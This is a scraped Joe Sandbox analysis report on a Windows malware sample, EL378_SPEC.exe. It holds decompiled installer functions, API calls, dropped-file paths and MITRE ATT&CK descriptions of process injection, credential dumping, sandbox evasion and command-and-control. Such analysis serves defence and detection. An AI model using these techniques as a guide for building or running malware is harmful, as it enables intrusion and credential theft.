Associated: 00000000.00000002.14988546500.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988969049.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EL378_SPEC.jbxd

Similarity

API ID: CloseQueryValue
String ID: Call
API String ID: 3356406503-1824292864
Opcode ID: ef5c50818b295da6df722ea66ea55a7044f0b077f586aae140e4b9602ce783b5
Instruction ID: a3e06d51c6875ee3f629547af2dd4b96d71687c661178dbbbd55dab6437f425a
Opcode Fuzzy Hash: ef5c50818b295da6df722ea66ea55a7044f0b077f586aae140e4b9602ce783b5
Instruction Fuzzy Hash: D3010C7651010ABBDB218FA4DC06AEF7BA8EF45344F110126B901E2160D275DE60DB94

Uniqueness

Uniqueness Score: -1.00%

Function 004058D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45
windowCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E004058D0(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t8;
				int _t11;
				int _t15;
				long _t16;

				_t16 = _a16;
				_t15 = _a8;
				_t8 = _t15;
				if(_t15 != 0x102) {
					__eflags = _t15 - 0x200;
					if(_t15 != 0x200) {
						__eflags = _t8 - 0x419;
						if(_t8 != 0x419) {
							L9:
							return CallWindowProcW( *0x42dd64, _a4, _t15, _a12, _t16);
						}
						L7:
						__eflags =  *0x42ed68 - _t16; // 0x0
						if(__eflags != 0) {
							_push(_t16);
							_push(6);
							 *0x42ed68 = _t16;
							E004054B6();
						}
						goto L9;
					}
					_t11 = IsWindowVisible(_a4);
					__eflags = _t11;
					if(_t11 == 0) {
						goto L9;
					}
					_t16 = E004056DA(_a4, "true");
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L9;
				}
				E004054E8(0x413);
				return 0;
			}

0x004058d4
0x004058d8
0x004058db
0x004058e3
0x004058f9
0x004058ff
0x00405921
0x00405926
0x0040593e
0x00000000
0x0040594c
0x00405928
0x00405928
0x0040592e
0x00405930
0x00405931
0x00405933
0x00405939
0x00405939
0x00000000
0x0040592e
0x00405904
0x0040590a
0x0040590c
0x00000000
0x00000000
0x00405918
0x0040591a
0x00000000
0x0040591a
0x004058e9
0x00000000
0x00000000
0x004058f0
0x00000000

APIs

IsWindowVisible.USER32(?), ref: 00405904
CallWindowProcW.USER32(?,?,?,?), ref: 0040594C

Part of subcall function 004054E8: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004054FA

Strings

, xrefs: 004058E5

Memory Dump Source

Source File: 00000000.00000002.14988488640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.14988453818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988546500.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988969049.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EL378_SPEC.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: ce6b446289bf2d1d80a1f39e5d6dd25478004387473800b399ee72f8fd73986e
Instruction ID: 06e031647f3a40a893da8a12316d751141f27423df1ca697d7c88d312f012a23
Opcode Fuzzy Hash: ce6b446289bf2d1d80a1f39e5d6dd25478004387473800b399ee72f8fd73986e
Instruction Fuzzy Hash: 64018F72A00609FBEF305F51ED44A9B3A2AEB54760F104437F904B61E1C2798892DFA9

Uniqueness

Uniqueness Score: -1.00%

Function 00405864 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32
comCOMMON

Download Yara Rule

C-Code - Quality: 44%

			E00405864(signed int __eax) {
				intOrPtr _v0;
				intOrPtr _t10;
				intOrPtr _t11;
				intOrPtr* _t12;

				_t11 =  *0x435a28;
				_t10 =  *0x435a2c;
				__imp__OleInitialize(0);
				 *0x435a60 =  *0x435a60 | __eax;
				E004054E8(0);
				if(_t10 != 0) {
					_t12 = _t11 + 0xc;
					do {
						_t10 = _t10 - 1;
						if(( *(_t12 - 4) & 0x00000001) == 0) {
							goto L4;
						} else {
							_push(_v0);
							if(E00401399( *_t12) != 0) {
								 *0x435acc =  *0x435acc + 1;
							} else {
								goto L4;
							}
						}
						goto L7;
						L4:
						_t12 = _t12 + 0x818;
					} while (_t10 != 0);
				}
				L7:
				E004054E8(0x404);
				__imp__OleUninitialize();
				return  *0x435acc;
			}

0x00405865
0x0040586c
0x00405874
0x0040587a
0x00405882
0x00405889
0x0040588b
0x0040588e
0x0040588e
0x00405893
0x00000000
0x00405895
0x00405895
0x004058a2
0x004058b0
0x00000000
0x00000000
0x00000000
0x004058a2
0x00000000
0x004058a4
0x004058a4
0x004058aa
0x004058ae
0x004058b6
0x004058bb
0x004058c0
0x004058cd

APIs

OleInitialize.OLE32(00000000), ref: 00405874

Part of subcall function 004054E8: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004054FA

OleUninitialize.OLE32(00000404,00000000), ref: 004058C0

Part of subcall function 00401399: MulDiv.KERNEL32(?,00007530,00000000), ref: 004013F9
Part of subcall function 00401399: SendMessageW.USER32(?,00000402,00000000), ref: 00401409

Strings

Tetraspgia Setup: Installing, xrefs: 00405864

Memory Dump Source

Source File: 00000000.00000002.14988488640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.14988453818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988546500.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988969049.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EL378_SPEC.jbxd

Similarity

API ID: MessageSend$InitializeUninitialize
String ID: Tetraspgia Setup: Installing
API String ID: 1011633862-546952963
Opcode ID: d3b477feca803d38b0fa0a9443a8adab0e946c85309316e9af7505676d23e992
Instruction ID: 6162ea9da32c9538b6d8593dc8e66a114e5892011aec6599076d88f80df4c0eb
Opcode Fuzzy Hash: d3b477feca803d38b0fa0a9443a8adab0e946c85309316e9af7505676d23e992
Instruction Fuzzy Hash: C5F0FA33500A009AF711B715AC02B6B73A8EB84705F08813EEE48A22A2E77948409B69

Uniqueness

Uniqueness Score: -1.00%

Function 0040620F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040620F(int _a4) {
				struct tagMSG _v32;
				int _t6;

				while(1) {
					_t2 =  &_a4; // 0x403579
					_t6 = PeekMessageW( &_v32, 0, _a4,  *_t2, "true");
					if(_t6 == 0) {
						break;
					}
					DispatchMessageW( &_v32);
				}
				return _t6;
			}

0x00406221
0x00406223
0x0040622f
0x00406237
0x00000000
0x00000000
0x0040621b
0x0040621b
0x0040623a

APIs

DispatchMessageW.USER32(?), ref: 0040621B
PeekMessageW.USER32(?,00000000,?,y5@,?), ref: 0040622F

Strings

y5@, xrefs: 00406223

Memory Dump Source

Source File: 00000000.00000002.14988488640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.14988453818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988546500.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988969049.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EL378_SPEC.jbxd

Similarity

API ID: Message$DispatchPeek
String ID: y5@
API String ID: 1770753511-1888225771
Opcode ID: 64ff892afa75a6f008d7101155dee183943c3d1907309ee94509adaab9142ef1
Instruction ID: a24ec92ef1b44bd1206bcd030c3399a913cbf723d0e0f52077422d22942c0190
Opcode Fuzzy Hash: 64ff892afa75a6f008d7101155dee183943c3d1907309ee94509adaab9142ef1
Instruction Fuzzy Hash: 41D0127194020ABBEF10AFE0DD09F9A7B6CAB54744F008475B701B5091D678D5258B59

Uniqueness

Uniqueness Score: -1.00%

Function 00406D10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00406D10(WCHAR* _a4) {
				WCHAR* _t5;
				WCHAR* _t8;

				_t8 = _a4;
				_t5 =  &(_t8[lstrlenW(_t8)]);
				while( *_t5 != 0x5c) {
					_push(_t5);
					_push(_t8);
					_t5 = CharPrevW();
					if(_t5 > _t8) {
						continue;
					}
					break;
				}
				 *_t5 = 0;
				return  &(_t5[1]);
			}

0x00406d11
0x00406d1c
0x00406d1f
0x00406d25
0x00406d26
0x00406d27
0x00406d2f
0x00000000
0x00000000
0x00000000
0x00406d2f
0x00406d33
0x00406d3a

APIs

lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00403458,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\EL378_SPEC.exe,C:\Users\user\Desktop\EL378_SPEC.exe,80000000,00000003,?,?,?,?,?), ref: 00406D16
CharPrevW.USER32(80000000,00000000,?,?,?,?,?), ref: 00406D27

Strings

C:\Users\user\Desktop, xrefs: 00406D10

Memory Dump Source

Source File: 00000000.00000002.14988488640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.14988453818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988546500.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988969049.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EL378_SPEC.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-3370423016
Opcode ID: ad5ea2724f566449118616985c1ca7d7286fc26986b3b6df7891a374239d9a00
Instruction ID: 44824fea6f3b9252f25675ab164e3effdf97f7511deaacd8752cc1a9fc297a0b
Opcode Fuzzy Hash: ad5ea2724f566449118616985c1ca7d7286fc26986b3b6df7891a374239d9a00
Instruction Fuzzy Hash: CBD05E31102531ABCB126B18DC059AF77B8EF41300306886AE542E7164C7785D92CBAD

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: EL378_SPEC.exePID: 7372, Parent PID: 7376COMMON

Execution Graph

Execution Coverage:	69%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	4
Total number of Limit Nodes:	0

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 03A45B43 Relevance: 1.3, APIs: 1, Instructions: 55
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(-44776A28), ref: 03A45B6F

Memory Dump Source

Source File: 00000002.00000002.15005932638.0000000003633000.00000040.00000400.00020000.00000000.sdmp, Offset: 03633000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3633000_EL378_SPEC.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 48f84f3d6461bfc86c49b4071fdf13e16d05d1f9408754c39c3186361427c21f
Instruction ID: 69d952c06e9eea371247eaa25cb9ed7241503f7d38c6463b2fb3ac9d920c9ccc
Opcode Fuzzy Hash: 48f84f3d6461bfc86c49b4071fdf13e16d05d1f9408754c39c3186361427c21f
Instruction Fuzzy Hash: 0F11B6356413019FDF68CE36C2E43997BA1AF52654B5CC09ECC8A4F55AD774C44ACF12

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report EL378_SPEC.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\mnstring\Fuldemands\Instrumentel.unp

C:\Users\user\AppData\Local\Temp\mnstring\glucosic.dal

C:\Users\user\AppData\Local\Temp\mnstring\slbene.exe

C:\Users\user\AppData\Local\Temp\mnstring\tvesprogede.fed

C:\Users\user\AppData\Local\Temp\nsb12B3.tmp\System.dll

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3425316567-2969588382-3778222414-1001\1b1d0082738e9f9011266f86ab9723d2_11389406-0377-47ed-98c7-d564e683c6eb

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Windows Analysis Report
EL378_SPEC.exe

Function 004036FC Relevance: 89.7, APIs: 32, Strings: 19, Instructions: 416
stringfilecomCOMMON

Function 00404B30 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 295
windowclipboardmemoryCOMMON

Function 6ECC2351 Relevance: 14.2, APIs: 9, Instructions: 657
stringmemoryCOMMONCrypto

Function 00406719 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 155
filestringCOMMON

Function 00403148 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 167
COMMON

Function 004065CF Relevance: 3.0, APIs: 2, Instructions: 14
fileCOMMON

Function 00404F92 Relevance: 63.4, APIs: 35, Strings: 1, Instructions: 374
windowstringCOMMON

Function 00405A3E Relevance: 45.7, APIs: 14, Strings: 12, Instructions: 225
stringregistryCOMMON

Function 0040154A Relevance: 38.9, APIs: 17, Strings: 5, Instructions: 441
stringtimesleepCOMMON

Function 004033ED Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 178
memoryCOMMON

Function 00405EBA Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 209
stringCOMMON

Function 00405D3A Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 76
stringwindowCOMMON

Function 0040619E Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Function 00406A56 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 35
COMMON

Function 0040225D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 81
libraryCOMMON

Function 00402656 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77
registrystringCOMMON

Function 004068E6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18
libraryloaderCOMMON

Function 00405E3E Relevance: 6.0, APIs: 4, Instructions: 37
COMMON

Function 00405E1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 12
COMMON

Function 6ECC167A Relevance: 4.6, APIs: 3, Instructions: 123
COMMON

Function 00401D01 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 71
memoryCOMMON

Function 004027B0 Relevance: 4.6, APIs: 3, Instructions: 53
registryCOMMON

Function 00402728 Relevance: 3.1, APIs: 2, Instructions: 58
registryCOMMON

Function 00401399 Relevance: 3.0, APIs: 2, Instructions: 49
windowCOMMON

Function 004025FF Relevance: 3.0, APIs: 2, Instructions: 40
registryCOMMON

Function 004066D6 Relevance: 3.0, APIs: 2, Instructions: 24
processCOMMON

Function 0040691B Relevance: 3.0, APIs: 2, Instructions: 14
fileCOMMON

Function 00406B9D Relevance: 3.0, APIs: 2, Instructions: 14
COMMON

Function 6ECC2D14 Relevance: 1.6, APIs: 1, Instructions: 143
COMMON